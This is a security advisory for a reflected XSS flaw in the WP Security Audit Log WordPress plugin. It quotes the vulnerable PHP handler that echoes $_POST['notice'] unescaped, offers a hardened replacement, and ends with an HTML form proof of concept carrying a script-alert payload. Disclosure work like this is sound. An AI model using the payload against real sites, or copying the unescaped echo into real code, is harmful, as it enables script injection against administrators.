WP Security Audit Log [Reflected XSS]

Description

The WP Security Audit Log plugin is vulnerable to reflected XSS through the AJAX action AjaxDisableCustomField. The vulnerable parameter is $_POST['notice'], which is echoed back to the response without any escaping. The vulnerable code is in the method \WpSecurityAuditLog::AjaxDisableCustomField():

public function AjaxDisableCustomField(){ 
    $fields = $this->GetGlobalOption('excluded-custom');
    if ( isset($fields) && $fields != "") {
        // user input is appended to the stored option without sanitization
        $fields .= ",".$_POST['notice'];
    } else {
        $fields = $_POST['notice'];
    }
    $this->SetGlobalOption('excluded-custom', $fields);
    // $_POST['notice'] is echoed back unescaped: this is the reflected XSS sink
    echo 'Custom Field '.$_POST['notice'].' is no longer being monitored.<br />Enable the monitoring of this custom field again from the <a href="admin.php?page=wsal-settings#tab-exclude"> Excluded Objects </a> tab in the plugin settings';
    die;
}

This method is also missing a capability check and an anti-CSRF (nonce) check, but those issues are described separately in DWF-2016-87076.
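For comparison, an added hardened version of the same handler (example code written here, not the plugin's own fix shipped in v2.4.4): it escapes the reflected value with esc_html at output time, sanitizes what is stored, and adds the nonce and capability checks the original lacks. GetGlobalOption/SetGlobalOption are the plugin methods from the snippet above; the nonce action name 'wsal-disable-custom-field' is an assumption.

```php
<?php
// Added example, not the plugin's patch: drop-in replacement for the method inside
// \WpSecurityAuditLog. check_ajax_referer, current_user_can, sanitize_text_field,
// wp_unslash, esc_html, esc_url, admin_url and wp_die are WordPress core functions.
public function AjaxDisableCustomField() {
    // Anti-CSRF: the request must carry a nonce issued for this action
    // (nonce action name is assumed; the request field is 'nonce').
    check_ajax_referer( 'wsal-disable-custom-field', 'nonce' );

    // Capability check: only users who may manage options can change plugin settings.
    if ( ! current_user_can( 'manage_options' ) ) {
        wp_die( 'Insufficient permissions', 403 );
    }

    // Sanitize the value before storing it: strips tags and newlines and removes
    // the slashes WordPress adds to request data.
    $field = isset( $_POST['notice'] ) ? sanitize_text_field( wp_unslash( $_POST['notice'] ) ) : '';
    if ( '' === $field ) {
        wp_die( 'Missing custom field name', 400 );
    }

    $fields = $this->GetGlobalOption( 'excluded-custom' );
    $fields = ( isset( $fields ) && '' !== $fields ) ? $fields . ',' . $field : $field;
    $this->SetGlobalOption( 'excluded-custom', $fields );

    // Escape at output time so a crafted field name renders as text, never as markup.
    $settings_url = esc_url( admin_url( 'admin.php?page=wsal-settings#tab-exclude' ) );
    echo 'Custom Field ' . esc_html( $field ) . ' is no longer being monitored.<br />'
       . 'Enable the monitoring of this custom field again from the '
       . '<a href="' . $settings_url . '">Excluded Objects</a> tab in the plugin settings';
    wp_die();
}
```

With this version the PoC below still submits the form, but the response shows the literal `<script>` text instead of executing it, and the request is rejected outright when the nonce or capability check fails.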

PoC

<form action="http://sbwp3.dev/wp-admin/admin-ajax.php" method="post">
    <input name="action" type="hidden" value="AjaxDisableCustomField" />
    <input name="notice" type="hidden" value="<script>alert(String.fromCharCode(88, 83, 83))</script>" />
    <input type="submit" value="Click Me!" />
</form>

Solution

Upgrade to v2.4.4 or later
